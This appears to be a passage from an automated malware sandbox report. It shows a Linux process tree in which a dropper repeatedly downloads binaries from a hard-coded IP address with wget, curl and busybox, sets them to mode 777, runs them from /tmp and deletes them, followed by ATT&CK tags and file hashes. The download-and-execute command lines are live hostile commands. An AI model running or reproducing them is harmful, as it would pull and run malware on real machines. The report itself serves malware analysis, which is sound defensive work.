/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:847
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:848 -
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:849 -
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:850
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:851
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:852 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:853
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:854 -
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:855 -
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:856
-
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:857
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:859
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:860 -
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:861 -
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:862
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:863
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:864 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:865
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:866 -
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:867 -
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:868
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:869
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:871
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:872 -
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:873 -
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:874
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:875
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:876 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:877
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:878 -
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:879 -
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:880
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:881 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:883 -
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:884 -
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:885 -
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:886 -
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:887
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:888 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:889
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:890 -
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:891 -
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:892
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:893
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:894 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:895
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:897 -
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:898 -
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:899
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:900
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:903
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:904 -
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:905 -
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:906
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:907
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:908 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:909
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:910 -
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:911 -
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:912
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:913
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:914 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:915
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:916 -
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:917 -
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:918
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:919
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:923 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:924
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:925 -
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:926 -
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:927
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97